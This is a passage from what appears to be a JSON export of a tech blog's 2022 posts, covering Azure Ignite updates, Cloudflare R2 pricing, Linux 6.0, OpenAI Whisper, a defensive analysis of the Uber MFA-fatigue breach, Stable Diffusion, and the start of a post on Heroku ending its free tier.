experience perspective. It provides cloud-based development workstations that can be pre-configured with project-specific tools, dependencies, and source code.\nI\u0026rsquo;ll admit I was skeptical about cloud-based dev environments when GitHub Codespaces first launched. But after using them for several projects this year, I\u0026rsquo;ve come around. The ability to spin up a fully configured development environment in minutes — rather than spending half a day fighting with local setup scripts — is genuinely productive. This builds on the broader shift toward cloud-first development.\nDev Box takes a slightly different approach from Codespaces by providing full Windows desktop environments rather than VS Code-centric containers. This matters for teams doing .NET development, game development, or anything that needs a full IDE experience. The per-hour pricing model makes it accessible for projects where you don\u0026rsquo;t need the environment running 24/7.\nAzure Container Apps Updates # The updates to Azure Container Apps are worth noting too. The service — which sits between Azure Functions and full AKS in terms of complexity — is getting Dapr integration improvements and better scaling controls.\nContainer Apps occupies an interesting niche. It gives you the simplicity of a PaaS with enough Kubernetes underneath that you\u0026rsquo;re not completely abstracted away from the container runtime. For teams that want to deploy containerized workloads without managing cluster infrastructure, it\u0026rsquo;s becoming a solid option.\nWhat I appreciate about this approach is that it doesn\u0026rsquo;t try to hide the fact that containers are involved. You still write Dockerfiles, you still think about container images, but the scheduling and scaling is handled for you. It\u0026rsquo;s the kind of pragmatic middle ground that works well for medium-complexity applications.\nMy Take # The overarching theme at Ignite this year is Microsoft meeting developers where they are rather than trying to pull them onto proprietary platforms. PostgreSQL support in Cosmos DB, Kubernetes fleet management, cloud dev environments — these are all about making existing workflows better rather than replacing them. This mirrors Microsoft\u0026rsquo;s broader platform consolidation strategy that has been accelerating.\nThis strategy is working. Azure\u0026rsquo;s growth continues to accelerate, and it\u0026rsquo;s largely because they\u0026rsquo;ve become the cloud that enterprise development teams actually want to use, not just the one their procurement department chose.\nThe challenge for Microsoft will be execution. These announcements are promising, but the gap between \u0026ldquo;public preview\u0026rdquo; and \u0026ldquo;production-ready for my workload\u0026rdquo; can be significant. I\u0026rsquo;ll be watching Fleet Manager and Cosmos DB for PostgreSQL closely over the coming months to see how they handle real-world edge cases.\nFor now, if you\u0026rsquo;re an Azure shop, this week\u0026rsquo;s announcements should give you confidence that the platform is evolving in the right direction. And if you\u0026rsquo;re not an Azure shop, several of these ideas — particularly multi-cluster management and cloud dev environments — are worth exploring regardless of your cloud provider.\n","date":"13 October 2022","externalUrl":null,"permalink":"/posts/221013-microsoft-ignite-2022-azure/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Microsoft Ignite 2022 delivered a wave of Azure updates that signal where enterprise cloud infrastructure is heading next.","title":"Microsoft Ignite 2022 — Azure's Quiet Infrastructure Revolution","type":"posts"},{"content":"Cloudflare has made R2 object storage generally available, and this one deserves attention from anyone who\u0026rsquo;s ever grimaced at an AWS bill. R2 is S3-compatible object storage with a radical pricing twist: zero egress fees. In an industry where data transfer costs have become a significant line item — and a major source of vendor lock-in — Cloudflare is going straight for the jugular.\nI\u0026rsquo;ve been testing R2 throughout the beta, and with the GA release landing during Cloudflare\u0026rsquo;s Birthday Week, it\u0026rsquo;s time to take a serious look at what this means for cloud architecture decisions.\nThe Egress Fee Problem # To understand why R2 matters, you need to understand the economics of cloud storage. AWS S3 charges $0.023 per GB per month for standard storage — that\u0026rsquo;s the part everyone focuses on during planning. But the egress fees — the cost to actually retrieve your data — are $0.09 per GB for the first 10TB, then slightly declining at scale.\nFor many workloads, egress costs dwarf storage costs. A CDN serving 100TB per month from S3 is paying around $2,300 in storage but $9,000 in egress. A data analytics pipeline that regularly pulls large datasets from S3 can accumulate surprising transfer bills. I\u0026rsquo;ve seen organizations where egress fees account for 40-60% of their total storage costs.\nThese fees also create a powerful lock-in mechanism. Moving your data to another provider means paying egress on every byte you transfer out. The larger your dataset, the more expensive it is to leave. It\u0026rsquo;s a clever business model, but it\u0026rsquo;s not one that serves customers well.\nCloudflare\u0026rsquo;s R2 eliminates egress fees entirely. Storage is priced at $0.015 per GB per month (cheaper than S3 Standard), and you pay only for operations (Class A at $4.50 per million, Class B at $0.36 per million). No egress. No transfer fees. No lock-in tax.\nS3 Compatibility and Migration Path # R2 implements the S3 API, which means existing tools and libraries work with minimal changes. If your application uses the AWS SDK, you can point it at R2 by changing the endpoint URL and credentials. I\u0026rsquo;ve tested this with boto3, the AWS CLI (with --endpoint-url), and several backup tools — the compatibility is solid for the core operations.\nimport boto3 r2 = boto3.client( \u0026#34;s3\u0026#34;, endpoint_url=\u0026#34;https://\u0026lt;account_id\u0026gt;.r2.cloudflarestorage.com\u0026#34;, aws_access_key_id=\u0026#34;\u0026lt;r2_access_key\u0026gt;\u0026#34;, aws_secret_access_key=\u0026#34;\u0026lt;r2_secret_key\u0026gt;\u0026#34;, ) # Standard S3 operations work as expected r2.put_object(Bucket=\u0026#34;my-bucket\u0026#34;, Key=\u0026#34;data.json\u0026#34;, Body=json.dumps(data)) r2.get_object(Bucket=\u0026#34;my-bucket\u0026#34;, Key=\u0026#34;data.json\u0026#34;) That said, R2 doesn\u0026rsquo;t implement every S3 feature. Notable gaps at GA include:\nNo object versioning (in development) No lifecycle policies (in development) No server-side encryption with customer-managed keys No S3 Select or Glacier-style tiered storage Limited event notification support For many use cases — static asset storage, backup destinations, data distribution, CDN origins — these gaps don\u0026rsquo;t matter. For complex data lake architectures that depend on versioning and lifecycle policies, S3 remains the more complete product.\nWhere R2 Makes Immediate Sense # Based on my testing and the pricing model, several use cases stand out:\nCDN origin storage: If you\u0026rsquo;re already using Cloudflare\u0026rsquo;s CDN (and many of us are), R2 as your origin storage is a natural fit. Assets flow from R2 through Cloudflare\u0026rsquo;s network with zero egress cost. The integration with Workers for dynamic content generation is also compelling.\nBackup and archive: The zero egress model is particularly attractive for backups, where you store data regularly but retrieve it rarely — and when you do retrieve it, you want to do so quickly and without surprise costs. I\u0026rsquo;ve already migrated several backup workflows from S3 to R2.\nMulti-cloud data distribution: If you serve data to consumers across different cloud providers or on-premises environments, R2 eliminates the egress penalty that makes multi-cloud architectures expensive.\nDeveloper and open-source projects: The free tier (10GB storage, 10 million Class B operations per month) is generous enough for small projects, and the absence of egress fees removes the fear of unexpected bills from traffic spikes.\nThe Competitive Landscape # R2 isn\u0026rsquo;t the only S3 alternative. Backblaze B2, Wasabi, and MinIO (for self-hosted) have been viable options for years. But Cloudflare brings something the others can\u0026rsquo;t easily match: a global edge network.\nR2 storage is distributed across Cloudflare\u0026rsquo;s network, and when combined with Workers (their serverless compute platform), you get a compelling stack for building globally distributed applications. The vision is clearly to offer a complete cloud platform that competes not just on storage pricing but on the overall developer experience.\nAWS isn\u0026rsquo;t standing still either. They\u0026rsquo;ve been gradually reducing data transfer costs and introducing initiatives like the AWS Free Tier for data transfer. But the fundamental pricing model — where egress is a profit centre — is deeply embedded in AWS\u0026rsquo;s business. It\u0026rsquo;s hard to see them matching R2\u0026rsquo;s zero-egress model without significant revenue impact.\nGoogle Cloud\u0026rsquo;s move to waive egress fees for customers migrating away was a notable competitive response, but it\u0026rsquo;s a one-time migration benefit rather than an ongoing pricing model change.\nMy Take # Cloudflare R2 at GA is a solid product for specific use cases, not a universal S3 replacement. The feature gaps are real, and for complex storage requirements, S3\u0026rsquo;s maturity and ecosystem depth remain unmatched. But for the use cases where R2 fits — and there are many — the cost savings are substantial and the migration path is straightforward.\nWhat I find most significant is the competitive pressure R2 puts on the broader cloud storage market. Even if you never use R2, its existence may lead to lower egress fees across all providers. Competition in cloud infrastructure pricing has been tepid for years, and Cloudflare is the most credible challenger to emerge in some time.\nMy recommendation: identify your highest-egress workloads, evaluate whether R2\u0026rsquo;s feature set is sufficient, and run the numbers. For many teams, this could be one of the easiest cost optimisations of the year. Start with a non-critical workload, validate the S3 compatibility against your specific usage patterns, and expand from there.\nThe cloud storage market just got more interesting, and that\u0026rsquo;s good for all of us.\n","date":"6 October 2022","externalUrl":null,"permalink":"/posts/221006-cloudflare-r2-storage-wars/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Cloudflare R2’s general availability challenges AWS S3’s dominance with zero egress fees and full S3 API compatibility, reshaping the economics of cloud storage.","title":"Cloudflare R2 Goes GA — The S3-Compatible Storage War Heats Up","type":"posts"},{"content":"Linus Torvalds released Linux 6.0 this week, and true to form, he immediately downplayed the version number. \u0026ldquo;I\u0026rsquo;d like to note (yet again) that we don\u0026rsquo;t do feature-based releases, and that \u0026lsquo;6.0\u0026rsquo; doesn\u0026rsquo;t mean anything more than that the 5.x numbers were getting big enough that I ran out of fingers and toes,\u0026rdquo; he wrote in the announcement. Classic Linus.\nBut while the version number itself may be arbitrary — Torvalds famously bumped from 2.x to 3.x and from 4.x to 5.x on similar whims — the contents of this release are anything but trivial. Linux 6.0 packs genuine technical significance, including the initial infrastructure for Rust in the kernel, meaningful performance work, and continued hardware enablement that keeps Linux relevant across everything from phones to supercomputers.\nRust Enters the Kernel (Sort Of) # The headline feature for many developers is the inclusion of initial Rust infrastructure in the kernel build system. To be clear about what this means right now: Linux 6.0 doesn\u0026rsquo;t ship Rust-written drivers or subsystems. What it includes is the foundational tooling — the build system integration, the abstractions, and the framework — that will allow Rust code to coexist with C in future kernel development. This represents a major step in Rust\u0026rsquo;s adoption for systems programming.\nThis has been a long journey. The Rust-for-Linux project, led by Miguel Ojeda, has been developing these patches for over two years. The inclusion in mainline represents a significant milestone, even though practical Rust kernel modules are still some way off. Recent Rust releases like 1.63 continue to stabilize systems programming features that kernel developers depend on.\nWhy does this matter? Because memory safety bugs account for roughly 70% of serious security vulnerabilities in systems code, according to studies from both Microsoft and Google\u0026rsquo;s Project Zero. The Linux kernel, written almost entirely in C, is not immune to this. Buffer overflows, use-after-free bugs, and null pointer dereferences are a constant battle.\nRust\u0026rsquo;s ownership model and borrow checker eliminate entire categories of these bugs at compile time. The potential for writing safer device drivers and kernel modules — the areas where most security bugs cluster — is genuinely compelling. I\u0026rsquo;ve spent enough years debugging memory corruption issues in C to appreciate what this could mean for kernel reliability. Memory safety has long been a critical issue in security-critical systems.\nThat said, let\u0026rsquo;s be realistic. The kernel has over 30 million lines of C code. Nobody is rewriting that in Rust. The practical path is new drivers and modules written in Rust, gradually expanding the safe-code surface area over many years. It\u0026rsquo;s an evolutionary approach, and it\u0026rsquo;s the right one.\nPerformance Improvements That Matter # Beyond the Rust story, Linux 6.0 brings several performance improvements that will matter to anyone running production workloads:\nImproved memory management: The Multi-Gen LRU (MGLRU) page reclamation mechanism, which has been in development for some time, continues to mature. Early benchmarks show significant improvements in memory-pressure scenarios, particularly for workloads with large working sets. If you\u0026rsquo;re running databases or caching layers on Linux, this is directly relevant.\nCPU scheduling refinements: The scheduler has received attention for better handling of hybrid architectures — the Intel big.LITTLE style processors that mix performance and efficiency cores. As these become standard in both laptop and server silicon, the kernel\u0026rsquo;s ability to make intelligent scheduling decisions becomes increasingly important.\nFile system work: Btrfs receives ongoing reliability and performance improvements, and there\u0026rsquo;s continued work on the io_uring asynchronous I/O framework that\u0026rsquo;s becoming the preferred path for high-performance applications. The io_uring improvements in particular are worth tracking if you\u0026rsquo;re building latency-sensitive network services.\nHardware Enablement # The breadth of hardware support in each kernel release is something I think people take for granted, but it represents an enormous amount of engineering effort:\nInitial support for Intel\u0026rsquo;s upcoming Meteor Lake and Arrow Lake platforms AMD Zen 4 support improvements RISC-V architecture enhancements, including better SMP support ARM improvements targeting both mobile and server workloads LoongArch architecture support continuing to mature The RISC-V work is particularly interesting to me. We\u0026rsquo;re watching an open-source instruction set architecture gain real kernel support alongside the dominant proprietary architectures. The parallel between open-source software and open-source hardware is playing out in real time.\nThe Kernel Development Model Still Works # What continues to impress me about the Linux kernel project — and I\u0026rsquo;ve been following it since the early 2.x days — is that the development model scales. Linux 6.0 includes contributions from over 2,000 developers representing hundreds of companies. The merge window, release candidate, and final release cadence produces a new stable kernel roughly every 9-10 weeks, and it\u0026rsquo;s been doing so reliably for years.\nThis is a project with over 30 million lines of code, thousands of active contributors, and stakes that include running most of the world\u0026rsquo;s servers, smartphones, embedded devices, and supercomputers. The fact that it continues to ship on schedule with high quality is a testament to the development process, the maintainer hierarchy, and the tooling around it.\nThe kernel mailing list can be a rough place, and the project has had its share of cultural challenges. But the engineering process works, and Linux 6.0 is proof of that.\nMy Take # Linux 6.0 isn\u0026rsquo;t a revolution — it\u0026rsquo;s an evolution, and that\u0026rsquo;s exactly what you want from the software that underpins most of the world\u0026rsquo;s computing infrastructure. The Rust support is the most forward-looking change, and I\u0026rsquo;m cautiously optimistic about what it means for kernel security over the next decade.\nIf you maintain production Linux systems, the upgrade path from 5.19 to 6.0 should be straightforward for most workloads. The LTS kernel (5.15) remains a solid choice for conservative environments, but I\u0026rsquo;d encourage testing 6.0 in staging to familiarise yourself with the changes.\nAfter three decades in this industry, the Linux kernel remains one of the most impressive collaborative engineering efforts in human history. Version 6.0 is another solid step forward, and the foundation it lays for Rust in the kernel could prove to be one of the most significant architectural decisions of the decade. Sometimes the most impactful changes are the quiet ones.\n","date":"29 September 2022","externalUrl":null,"permalink":"/posts/220929-linux-kernel-6-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Linux 6.0 arrives with Rust language support, performance improvements, and new hardware enablement — but the real story is what the version bump signals about the kernel’s evolution.","title":"Linux 6.0 Lands — A Milestone That's Less About the Number","type":"posts"},{"content":"OpenAI just did something unexpected: they open-sourced a genuinely excellent speech recognition model. Whisper is a general-purpose speech recognition system trained on 680,000 hours of multilingual and multitask supervised data collected from the web. And unlike some \u0026ldquo;open\u0026rdquo; AI releases that come with asterisks, this one ships with full model weights, inference code, and a permissive MIT license.\nAfter watching OpenAI keep DALL-E 2 and GPT-3 firmly behind API walls, Whisper\u0026rsquo;s open release caught me off guard. Having spent the past few days putting it through its paces, I can say this: it\u0026rsquo;s the real deal. For many practical use cases, Whisper performs at a level that makes commercial speech-to-text APIs nervous.\nThe Technical Architecture # Whisper is an encoder-decoder Transformer trained as a multitask model. It handles English and multilingual speech recognition, speech translation, spoken language identification, and voice activity detection — all from a single model. The architecture itself isn\u0026rsquo;t revolutionary; it\u0026rsquo;s a fairly standard Transformer applied to log-Mel spectrograms of audio input. What\u0026rsquo;s remarkable is the scale and quality of training.\nThe model comes in several sizes, from \u0026ldquo;tiny\u0026rdquo; (39M parameters) to \u0026ldquo;large\u0026rdquo; (1.55B parameters):\nModel Parameters English-only Multilingual Required VRAM tiny 39M ✓ ✓ ~1 GB base 74M ✓ ✓ ~1 GB small 244M ✓ ✓ ~2 GB medium 769M ✓ ✓ ~5 GB large 1550M ✗ ✓ ~10 GB The \u0026ldquo;small\u0026rdquo; and \u0026ldquo;medium\u0026rdquo; models hit a sweet spot for most applications — good accuracy without demanding a high-end GPU. I\u0026rsquo;ve been running the medium model on a modest workstation GPU, and the results are consistently impressive.\nInstallation is straightforward:\npip install git+https://github.com/openai/whisper.git And usage is remarkably simple:\nimport whisper model = whisper.load_model(\u0026#34;medium\u0026#34;) result = model.transcribe(\u0026#34;meeting_recording.mp3\u0026#34;) print(result[\u0026#34;text\u0026#34;]) Three lines of code for transcription that handles accents, background noise, and multiple speakers better than most commercial solutions I\u0026rsquo;ve used.\nWhere Whisper Shines # I\u0026rsquo;ve tested Whisper against several scenarios that typically trip up speech recognition systems, and the results are notable:\nAccented English: As a Dutchman who\u0026rsquo;s worked internationally for decades, I\u0026rsquo;m acutely aware of how badly most speech recognition handles non-native English speakers. Whisper handles Dutch-accented English, Indian English, and various European accents with significantly fewer errors than Google\u0026rsquo;s Speech-to-Text API in my informal testing.\nTechnical content: Transcribing developer conference talks — where speakers reference API names, programming terms, and acronyms — has always been a pain point. Whisper handles this better than expected, though it still stumbles on very domain-specific terminology.\nNoisy environments: Meeting recordings with background chatter, typing sounds, and air conditioning noise come through cleanly. The model\u0026rsquo;s robustness to noise is a clear benefit of training on web-scraped audio, which includes plenty of imperfect recordings.\nMultilingual content: The model handles code-switching — speakers who mix languages mid-sentence — remarkably well. For international teams, this is a significant practical advantage.\nWhat It Means for Developers # The immediate applications are obvious: meeting transcription, podcast indexing, accessibility features, voice interfaces, content moderation for audio platforms. But I think the more interesting implications are in the second-order effects.\nFirst, the cost equation changes dramatically. Cloud speech-to-text APIs charge per minute of audio. Running Whisper locally makes the marginal cost essentially zero after the initial hardware investment. For applications processing large volumes of audio — think podcast platforms, call centres, or media archives — this is transformative.\nSecond, privacy-sensitive transcription becomes feasible. Medical dictation, legal proceedings, confidential meetings — any context where sending audio to a third-party API raises compliance concerns can now be handled on-premises. I\u0026rsquo;ve spoken with teams in healthcare and legal sectors who have been waiting for exactly this capability.\nThird, the building blocks for more complex pipelines are now open. Combine Whisper with a language model for summarisation, with a translation model for localisation, or with a speaker diarisation system for meeting minutes. The composability of open models is where the real value compounds.\nThe Broader Pattern # Whisper\u0026rsquo;s release continues an interesting trend. Stability AI open-sourced Stable Diffusion a few weeks ago. Meta released OPT and subsequently other language models, continuing the open-weight momentum. The AI landscape is bifurcating between proprietary API-first approaches and open-weight community-driven development.\nAs someone who cut their teeth on open-source culture in the 1990s, this split feels familiar. The same tensions between open and proprietary that played out with operating systems, databases, and web frameworks are now playing out with AI models. And if history is any guide, the open approach will generate more innovation, even if proprietary systems maintain quality advantages in certain areas.\nWhat\u0026rsquo;s particularly smart about OpenAI\u0026rsquo;s move here is that Whisper is complementary to their commercial products rather than competitive with them. Open-sourcing speech recognition builds goodwill and ecosystem while their revenue drivers — GPT-3 API access, DALL-E — remain proprietary. It\u0026rsquo;s a calculated move, but a welcome one.\nMy Take # Whisper is one of those releases that immediately goes into my standard toolkit. The accuracy-to-effort ratio is exceptional. I\u0026rsquo;ve already integrated it into a personal workflow for transcribing conference talks and technical podcasts into searchable text, and I\u0026rsquo;m exploring its use for automated meeting notes.\nIf you work with audio in any capacity, set aside an afternoon to experiment with Whisper. Start with the \u0026ldquo;small\u0026rdquo; model for quick iteration, move to \u0026ldquo;medium\u0026rdquo; for production quality, and test against your specific use cases. The gap between this and what was freely available even six months ago is remarkable.\nThe age of \u0026ldquo;good enough\u0026rdquo; open-source AI models is arriving faster than most of us expected. Whisper won\u0026rsquo;t be the last model to make us rethink our architecture decisions, and that\u0026rsquo;s exactly the kind of disruption our industry needs.\n","date":"22 September 2022","externalUrl":null,"permalink":"/posts/220922-openai-whisper-speech-recognition/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI open-sources Whisper, a speech recognition model trained on 680,000 hours of data that approaches human-level accuracy across multiple languages.","title":"OpenAI Whisper — Open Source Speech Recognition That Actually Works","type":"posts"},{"content":"Today, Uber disclosed that an attacker gained broad access to their internal systems — Slack, Google Workspace, AWS consoles, HackerOne vulnerability reports, and more. The initial reports suggest it was an 18-year-old who got in through social engineering. Not a sophisticated zero-day exploit. Not a state-sponsored attack chain. A teenager with patience and a messaging app.\nThis should scare every engineering leader reading this. Not because Uber is uniquely bad at security — they\u0026rsquo;ve invested heavily since their 2016 breach — but because the attack vector exploits assumptions that most of us are making right now. Social engineering and MFA attacks have become increasingly common across the industry.\nHow It Happened # Based on what\u0026rsquo;s been reported so far, the attack chain went roughly like this:\nThe attacker obtained credentials for an Uber contractor, possibly through a dark web marketplace or prior phishing campaign The contractor had multi-factor authentication (MFA) enabled The attacker repeatedly triggered MFA push notifications — a technique known as \u0026ldquo;MFA fatigue\u0026rdquo; or \u0026ldquo;MFA bombing\u0026rdquo; After being bombarded with authentication prompts, the contractor eventually approved one (the attacker also reportedly contacted them on WhatsApp, posing as Uber IT) Once inside the VPN, the attacker found a PowerShell script on a network share containing hardcoded admin credentials for Uber\u0026rsquo;s Privileged Access Management (PAM) system Game over. Those PAM credentials unlocked access to virtually everything The screenshots the attacker posted to Uber\u0026rsquo;s internal Slack channels are almost comical in their breadth of access. AWS console, vSphere admin, Google Workspace admin, SentinelOne security dashboard — the attacker had the keys to the kingdom.\nMFA Fatigue Is a Real Problem # Let\u0026rsquo;s talk about step 3, because this is where most security architectures are failing. Push-based MFA — where you tap \u0026ldquo;Approve\u0026rdquo; on your phone — was supposed to be the reasonable middle ground between security and usability. And for years, it worked well enough.\nBut MFA fatigue attacks exploit a fundamental UX problem: if you send someone enough push notifications at 3 AM, eventually they\u0026rsquo;ll tap \u0026ldquo;Approve\u0026rdquo; just to make it stop. It\u0026rsquo;s the authentication equivalent of alarm fatigue in hospitals, and it\u0026rsquo;s just as dangerous. This is a predictable human factor in security design.\nThe mitigations exist but aren\u0026rsquo;t widely deployed:\nNumber matching: the authentication prompt shows a number that the user must enter, rather than just tapping \u0026ldquo;Approve\u0026rdquo; Rate limiting: blocking excessive MFA requests and alerting security teams FIDO2/WebAuthn: phishing-resistant hardware tokens that can\u0026rsquo;t be socially engineered Contextual signals: denying authentication attempts from unusual locations or devices Microsoft has been pushing number matching for Azure AD, and Duo has added similar features. But how many organisations have actually enabled these? In my experience consulting across the industry, the answer is \u0026ldquo;not nearly enough.\u0026rdquo;\nThe Hardcoded Credentials Problem # Step 5 is the one that really makes me wince. Hardcoded credentials in a PowerShell script on a network share. In 2022. At a company that employs thousands of engineers and has a dedicated security team.\nBefore anyone gets smug about this, I\u0026rsquo;d ask: have you audited every script, configuration file, and internal wiki in your organisation? I\u0026rsquo;ve been in this industry for thirty years, and I guarantee that virtually every company of sufficient size has credentials hiding in places they shouldn\u0026rsquo;t be. It\u0026rsquo;s not a matter of policy — every company has policies against this. It\u0026rsquo;s a matter of enforcement and tooling.\nThis is where secrets management platforms like HashiCorp Vault, AWS Secrets Manager, or Azure Key Vault earn their keep. But deploying them is only half the battle. You also need:\nAutomated scanning for secrets in code repositories (tools like truffleHog or GitLeaks) Regular audits of shared drives and internal resources Just-in-time privilege escalation rather than standing admin credentials Network segmentation that limits lateral movement even after initial compromise Zero Trust Isn\u0026rsquo;t Just a Buzzword # The Uber breach is a textbook argument for zero trust architecture — and I say that as someone who\u0026rsquo;s usually sceptical of security marketing terms. The core principle is straightforward: don\u0026rsquo;t trust anything inside your network perimeter any more than you trust things outside it. This principle is increasingly critical as the shift to distributed work makes traditional network perimeters obsolete.\nIn Uber\u0026rsquo;s case, once the attacker was past the VPN, they had remarkably free lateral movement. A zero trust approach would have required continuous verification at each system boundary, limited the blast radius of compromised credentials, and made it much harder to pivot from a contractor VPN session to AWS admin access.\nThe practical implementation looks like:\nMicrosegmentation of network resources Per-application authentication rather than VPN-grants-everything Continuous device health verification Least-privilege access with time-limited elevation Comprehensive logging and anomaly detection at every layer My Take # Every security incident teaches us something, and the lesson from Uber\u0026rsquo;s breach isn\u0026rsquo;t new — but it\u0026rsquo;s one we keep failing to learn. Defence in depth isn\u0026rsquo;t optional. MFA is necessary but not sufficient. And the biggest vulnerabilities in most organisations aren\u0026rsquo;t technical — they\u0026rsquo;re the gap between security policy and actual implementation.\nI\u0026rsquo;ll be watching closely as more details emerge about this breach. But if you\u0026rsquo;re an engineering leader reading this today, here\u0026rsquo;s what I\u0026rsquo;d do right now:\nAudit your MFA implementation. If you\u0026rsquo;re using simple push notifications without number matching, you\u0026rsquo;re vulnerable to fatigue attacks. Upgrade or add compensating controls. Run a secrets scan. Today. Not next quarter. Use automated tools to sweep your repositories, shared drives, and internal wikis. Review your PAM configuration. Standing admin credentials accessible from general network shares is an unacceptable risk. Test your lateral movement controls. Red team your own network — can a compromised VPN session reach your crown jewels? Security isn\u0026rsquo;t a product you buy. It\u0026rsquo;s a practice you maintain. And days like today are uncomfortable reminders of what happens when the practice slips.\n","date":"15 September 2022","externalUrl":null,"permalink":"/posts/220915-uber-breach-social-engineering/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A teenager allegedly breached Uber’s internal systems through social engineering and MFA fatigue, exposing fundamental weaknesses in how we think about authentication.","title":"The Uber Breach — When MFA Isn't Enough","type":"posts"},{"content":"In the span of just a few weeks, the AI landscape has shifted dramatically. Stability AI released Stable Diffusion as an open-source model, and the developer community has responded with an intensity I haven\u0026rsquo;t seen since the early days of Linux. Within days of the release, people were running state-of-the-art image generation on consumer GPUs, building applications, creating art, and — importantly — dissecting the model\u0026rsquo;s architecture to understand what makes it tick.\nAfter thirty years of watching open-source movements reshape technology, I can tell you: this one feels different. We\u0026rsquo;re not talking about a database engine or a web framework. We\u0026rsquo;re talking about a model that generates photorealistic images from text prompts, running on hardware you probably already own.\nWhat Stable Diffusion Actually Is # For those who haven\u0026rsquo;t dived in yet, Stable Diffusion is a latent diffusion model trained on the LAION-5B dataset. Unlike DALL-E 2 or Midjourney, which remain locked behind APIs and waitlists, Stable Diffusion ships with full model weights. You can download it, run it locally, fine-tune it on your own data, and integrate it into your applications without asking anyone\u0026rsquo;s permission.\nThe technical achievement here is significant. The model operates in a compressed latent space rather than pixel space directly, which is what makes it feasible to run on a GPU with 8GB of VRAM. The architecture combines a variational autoencoder, a U-Net backbone for the diffusion process, and a CLIP text encoder. If you\u0026rsquo;ve been following the diffusion model literature, this is a masterful engineering exercise in making cutting-edge research practical.\nWhat strikes me most is how quickly the community has started optimizing. Within the first week, we saw implementations that reduced memory requirements, sped up inference with various sampling strategies, and even got the model running on Apple Silicon via Core ML conversions. The pace of community innovation around an open model dwarfs what any single company could achieve behind closed doors.\nThe Developer Ecosystem Is Exploding # The real story isn\u0026rsquo;t just the model — it\u0026rsquo;s what developers are building on top of it. I\u0026rsquo;ve been watching GitHub like a hawk this past week, and the number of projects spawning around Stable Diffusion is staggering.\nAutomatic1111\u0026rsquo;s web UI has already become the de facto interface for local usage, offering features like inpainting, outpainting, and batch processing that rival commercial tools. There are img2img pipelines, textual inversion experiments for teaching the model new concepts from just a handful of images, and integrations with tools like Blender and Photoshop.\nFrom a software engineering perspective, this is a fascinating case study in how quickly open-source ecosystems form. The model was released on August 22, and we already have a rich tooling layer, documentation efforts, and specialised fine-tuning workflows. The Python ecosystem — particularly the Hugging Face diffusers library — has made it trivially easy to integrate the model into existing applications with just a few lines of code.\nfrom diffusers import StableDiffusionPipeline pipe = StableDiffusionPipeline.from_pretrained(\u0026#34;CompVis/stable-diffusion-v1-4\u0026#34;) pipe = pipe.to(\u0026#34;cuda\u0026#34;) image = pipe(\u0026#34;a photo of an astronaut riding a horse\u0026#34;).images[0] image.save(\u0026#34;astronaut.png\u0026#34;) That\u0026rsquo;s it. Four lines to generate an image that would have been science fiction two years ago.\nThe Open Source Debate # Not everyone is celebrating, and I think the concerns deserve serious attention. When you open-source a model this powerful, you lose control over how it\u0026rsquo;s used. There are legitimate concerns about deepfakes, non-consensual imagery, and the potential for misuse that closed APIs can at least attempt to moderate.\nStability AI has included a CreativeML Open RAIL-M license that prohibits certain harmful uses, but enforcement of license terms on an open model is essentially an honour system. This is a genuinely hard problem, and I don\u0026rsquo;t think the industry has good answers yet.\nThat said, I come down firmly on the side of open release. My experience over three decades in tech has consistently shown that keeping powerful technology locked away doesn\u0026rsquo;t prevent misuse — it just concentrates the power in fewer hands. Open models allow researchers, ethicists, and the broader community to study, audit, and develop mitigations. You can\u0026rsquo;t fix what you can\u0026rsquo;t see.\nThe parallel to cryptography is instructive. We went through this exact debate in the 1990s with the crypto wars, and the consensus that emerged — that open, auditable systems are more trustworthy than closed ones — applies equally here.\nImplications for Software Teams # If you lead a development team, you should be paying attention right now. Generative image AI is about to become a standard capability that applications can incorporate. The barriers to entry have collapsed from \u0026ldquo;negotiate an enterprise API contract\u0026rdquo; to \u0026ldquo;pip install.\u0026rdquo;\nI\u0026rsquo;d recommend setting up a local Stable Diffusion instance and experimenting. Understand the capabilities and limitations firsthand. Think about where generated imagery could enhance your product — whether that\u0026rsquo;s placeholder content, dynamic illustrations, design prototyping, or something entirely novel.\nThe inference costs are also worth noting. Running the model locally means zero per-image API costs. For applications that need to generate images at scale, this changes the economics completely.\nMy Take # We\u0026rsquo;re at an inflection point. The open release of Stable Diffusion isn\u0026rsquo;t just a product launch — it\u0026rsquo;s a philosophical statement about how AI development should work. And judging by the community response, it\u0026rsquo;s a statement that resonates.\nI\u0026rsquo;ve been building software since before the web existed, and every few years something comes along that makes me sit up and rethink assumptions. Stable Diffusion is one of those moments. Not because the technology is perfect — it isn\u0026rsquo;t — but because the model of open, democratised access to powerful AI tools feels like it could define the next era of software development.\nThe genie is well and truly out of the bottle. What the community builds next will be fascinating to watch.\n","date":"8 September 2022","externalUrl":null,"permalink":"/posts/220908-stable-diffusion-open-source-ai/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Stability AI’s open release of Stable Diffusion marks a watershed moment for generative AI, putting powerful image generation in the hands of every developer.","title":"Stable Diffusion Goes Open Source — And Changes Everything","type":"posts"},{"content":"Last week, Salesforce-owned Heroku announced that they\u0026rsquo;re eliminating free dynos, free Heroku Postgres, and free Heroku Data for Redis, effective November 28, 2022. After years of being the go-to \u0026ldquo;just push and deploy\u0026rdquo; platform for students, hobbyists, and early-stage projects, Heroku\u0026rsquo;s free tier is going away.\nI\u0026rsquo;m not going to pretend this is surprising — the writing has been on the wall since Salesforce acquired Heroku in 2010, and the platform has felt increasingly neglected in recent years. But the impact on the developer ecosystem is real, and it\u0026rsquo;s worth examining what we\u0026rsquo;re losing and where we go from here.\nWhat Heroku\u0026rsquo;s Free Tier Actually Meant # For an entire generation of developers, Heroku was the first place they deployed something to the internet. The experience was magical — git push heroku main and your app was live. No SSH, no server configuration, no nginx config files, no Docker, no Kubernetes. Just code to URL in seconds.\nI\u0026rsquo;ve recommended Heroku\u0026rsquo;s free tier countless times over the years — to bootcamp students deploying their first Express app, to developers prototyping APIs for hackathons, to hobbyists running small Discord bots. The free dyno with its 30-minute sleep timer wasn\u0026rsquo;t powerful, but it was enough to learn, experiment, and ship.\nThe educational impact is hard to overstate. Platforms like freeCodeCamp, The Odin Project, and countless university courses built their deployment tutorials around Heroku. Every full-stack bootcamp graduate in the last decade probably has a Heroku app in their portfolio. That entire ecosystem now needs to update its 